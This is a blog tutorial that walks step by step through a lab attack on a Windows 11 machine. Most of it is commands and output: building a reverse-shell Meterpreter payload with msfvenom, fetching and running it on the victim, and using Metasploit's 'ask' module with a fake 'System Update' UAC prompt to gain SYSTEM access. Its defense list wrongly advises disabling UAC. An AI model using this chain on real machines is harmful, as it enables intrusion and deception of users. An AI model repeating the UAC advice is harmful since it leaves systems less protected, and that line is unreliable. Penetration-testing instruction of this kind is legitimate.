Unlock cybersecurity expertise, protect digital frontiers, secure your future today! Join Now
Home
Cyber Security

Windows Privilege Escalation Using Metasploit’s exploit/windows/local/ask Module

Learn how to escalate privileges on Windows using Metasploit's local ask module with step-by-step payload creation, execution, and validation

Windows Privilege Escalation Using Metasploit’s exploit/windows/local/ask Module

Introduction

Privilege escalation is a crucial stage in post-exploitation that allows an attacker to move from a limited user account to an administrative or SYSTEM-level shell. In controlled, ethical hacking environments, demonstrating these techniques can greatly enhance understanding of system security and threat modeling.

This article provides a complete walkthrough of how to:

  1. Generate a custom Windows Meterpreter payload
  2. Deliver and execute the payload to gain an initial session
  3. Elevate privileges using the Metasploit exploit/windows/local/ask module
  4. Validate privilege escalation by obtaining SYSTEM-level access

All steps are explained in a professional, beginner-friendly tone suitable for blog publication and institutional instruction.

Lab Environment

  • Attacker Machine: Kali Linux 
  • Victim Machine: Windows 11 Pro x64 (User-level access only)
  • Framework: Metasploit Framework (MSF)

Phase 1: Payload Generation

We begin by crafting a reverse TCP Meterpreter payload that will be delivered to the Windows machine. This simulates a phishing or file-drop scenario.

Step 1: Generate the Payload

Use msfvenom to create a Windows executable payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /var/www/html/initial_access.exe
  • -p windows/meterpreter/reverse_tcp: Payload type
  • LHOST: Local IP of the Kali machine
  • LPORT: Listener port
  • -f exe: Output format
  • -o: Output file location

Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: /var/www/html/initial_access.exe

Step 2: Start Web Server for Delivery

sudo systemctl start apache2

Step 3: Start Metasploit Listener

msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Phase 2: Delivering and Executing the Payload

Simulate downloading the file on the victim system:

Invoke-WebRequest -Uri http://192.168.1.100/initial_access.exe -OutFile C:\Users\User\Downloads\initial_access.exe
Start-Process C:\Users\User\Downloads\initial_access.exe

Result: Meterpreter session is opened.

Phase 3: Confirm Access Level

In Metasploit:

meterpreter > getuid
Server username: DESKTOP-WIN10\User

You currently have access as a regular user.

Phase 4: Privilege Escalation with exploit/windows/local/ask

The exploit/windows/local/ask module is a social engineering-based privilege escalation module. It launches a UAC prompt on the victim machine. If the user accepts it, your payload is executed with elevated privileges.

Step 1: Background the Current Session

meterpreter > background

Step 2: Load the Ask Module

use exploit/windows/local/ask

Step 3: Configure the Module

set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 5555

You may customize the UAC prompt:

set PROMPT_TITLE "System Update"
set PROMPT_MESSAGE "A system update requires administrator privileges to continue."

Step 4: Launch the Exploit

exploit

Metasploit Output:

[*] Started reverse TCP handler on 192.168.1.100:5555
[*] Asking the user for privilege escalation permission...
[*] If the user accepts, a new elevated session will be created.

Step 5: Wait for User Interaction

On the target Windows machine, the user sees a UAC prompt:

System Update
Do you want to allow this app to make changes to your device?

If the user clicks Yes, the module triggers an elevated session.

Windows Privilege Escalation Using Metasploit’s exploit/windows/local/ask Module

Phase 5: Post-Escalation Validation

Once the elevated session is returned:

[*] Sending stage (175174 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.100:5555 -> 192.168.1.105:49158)

Switch to the new session:

sessions -i 2

Check privilege:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

✅ You now have SYSTEM-level access.

Security Considerations

While the ask module isn’t a technical exploit, it’s highly effective in real-world red team operations. It’s a classic example of exploiting human behavior rather than code.

Limitations

  • User must accept the UAC prompt
  • Does not work silently
  • AV/EDR may flag the payload
  • Ideal for demonstration and awareness, not stealth

Best Practices for Defense

  • Disable UAC or set to "Always Notify"
  • Train users to recognize suspicious prompts
  • Implement application allowlisting
  • Monitor UAC-related events in Windows Event Logs

Conclusion

Privilege escalation is an essential step in assessing post-exploitation risk. The Metasploit exploit/windows/local/ask module offers a powerful way to demonstrate how user consent can be misused in insecure environments.